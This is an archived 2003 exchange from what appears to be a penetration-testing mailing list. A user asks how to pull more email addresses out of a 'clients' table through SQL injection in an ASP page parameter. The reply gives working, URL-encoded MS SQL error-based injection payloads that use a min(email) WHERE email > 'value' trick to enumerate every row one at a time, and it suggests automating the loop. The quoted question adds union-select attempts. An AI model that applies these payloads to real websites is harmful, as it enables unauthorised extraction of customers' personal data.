I believe the solution you're looking for is the old min-where-order-by trick. > ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b ' Try this: > ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'a' order by 1)) %2b ' After you get the first value (say it's anonat_private), you throw it into the where clause: > ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'anonat_private' order by 1)) %2b ' You get the next value, say it's axonat_private, then you do the next query: > ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'axonat_private' order by 1)) %2b ' And so on, until you don't get an error. Of course, for most gratifying results you write a little program that does this for you. Phil > -----Original Message----- > From: Daniel Savi [mailto:dssat_private] > Sent: Wednesday, February 12, 2003 12:49 PM > To: pen-testat_private > Subject: SQL injection - get more values > > > > > Hi :) > > i'm trying to get some info from clients table and email field.... > > i try this param into gubpage.asp?=... > ') union select sum(email) from clients-- > and got error about all queries needed...so, i tryed to solve with > ') union select sum(email),1,1,1.... from clients-- > until i get: operand type clash: text is incompatible with int > > i found this answer into this forum (thanks :)), was: > ' %2b convert(int, (SELECT email FROM clients WHERE email > > 'a')) %2b ' > > i got this: > Syntax error converting the varchar value 'anonat_private' to a > column of > data type int > > Now, my problem: How can i get other e-mail from table > knowing one valid > value? > > i try this > ' %2b convert(int, (SELECT email FROM clients WHERE email > > 'anonat_private')) %2b ' > but no success > > i think i can use NOT iN, but not sure how to use with convert... > > Any tip are welcome! > > Thanks > > -------------------------------------------------------------- > -------------- > This list is provided by the SecurityFocus Security > Intelligence Alert (SIA) Service. For more information on > SecurityFocus' SIA service which automatically alerts you to > the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Wed Feb 12 2003 - 13:27:01 PST